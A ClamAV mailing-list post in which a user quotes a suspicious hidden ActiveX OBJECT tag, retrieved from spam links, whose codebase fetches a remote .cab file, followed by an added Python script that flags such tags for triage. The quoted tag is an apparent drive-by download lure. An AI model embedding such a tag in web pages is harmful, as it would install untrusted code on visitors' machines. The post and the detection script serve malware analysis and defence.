I've been getting some persistent emails that I thought were just spam, but
out of curiosity I decided to wget some of the links from the spam. After a
redirect or two, this is the HTML that was retrieved:

<OBJECT id=msxml20ms1 style="LEFT: 0px; TOP: 0px" ondataavailable=""
classid="clsid:65431623-C69F-410E-A392-6360366CAC19"
codebase="http://www.linemovie.com/line/user2/msxml20.cab#version=1,0,0,1";
VIEWASTEXT width=0 height=0>
<PARAM NAME="_Version" VALUE="65536">
<PARAM NAME="_ExtentX" VALUE="2646">
<PARAM NAME="_ExtentY" VALUE="1323">
<PARAM NAME="_StockProps" VALUE="0">
</OBJECT>


I'm not up on all of the exploits for the browsers, but I'm suspicious of
this because it looks to me like it's trying to hide at the top left of the
screen.  I've downloaded the .cab file and clamav doesn't see anything wrong
with it. Google doesn't find any answers about the clsid string in use.  

Ideas?  Should I seek counseling for being too paranoid, or is this actually
an unknown threat?

Thanks,
-ron
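
The traits the post points at (an ActiveX classid, a codebase on a remote host, zero width and height) can be checked mechanically when triaging pages fetched from spam links. This is an added example, not part of the original post; the flag names and the choice of heuristics are assumptions, and a hit only marks the tag for analysis without saying anything about what the .cab contains.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed input: the OBJECT tag quoted in the post (PARAM lines trimmed).
SAMPLE = '''<OBJECT id=msxml20ms1 style="LEFT: 0px; TOP: 0px" ondataavailable=""
classid="clsid:65431623-C69F-410E-A392-6360366CAC19"
codebase="http://www.linemovie.com/line/user2/msxml20.cab#version=1,0,0,1";
VIEWASTEXT width=0 height=0>
<PARAM NAME="_Version" VALUE="65536">
</OBJECT>'''

def is_zero(value):
    """True for 0, 0px, 0.0 and similar; False for missing or non-zero sizes."""
    return bool(re.fullmatch(r"0+(\.0+)?(px)?", (value or "").strip().lower()))

class ObjectAudit(HTMLParser):
    """Records every <object> tag together with the traits worth a closer look."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "object":          # HTMLParser lowercases tag and attribute names
            return
        a = {k: (v or "") for k, v in attrs}
        flags = []
        if a.get("classid", "").strip().lower().startswith("clsid:"):
            flags.append("activex-classid")      # asks the browser for a COM control
        url = urlparse(a.get("codebase", "").strip())
        if url.scheme in ("http", "https", "ftp"):
            flags.append("remote-codebase")      # control is fetched if not installed
            if url.path.lower().endswith(".cab"):
                flags.append("cab-download")
        if is_zero(a.get("width")) and is_zero(a.get("height")):
            flags.append("zero-size")            # nothing visible is rendered
        self.findings.append({"classid": a.get("classid", ""),
                              "host": url.hostname, "flags": flags})

def audit(html):
    """Return one finding dict per <object> tag in the given HTML text."""
    parser = ObjectAudit()
    parser.feed(html)
    parser.close()
    return parser.findings

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```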


_______________________________________________
Clamav-users mailing list
https://lists.sourceforge.net/lists/listinfo/clamav-users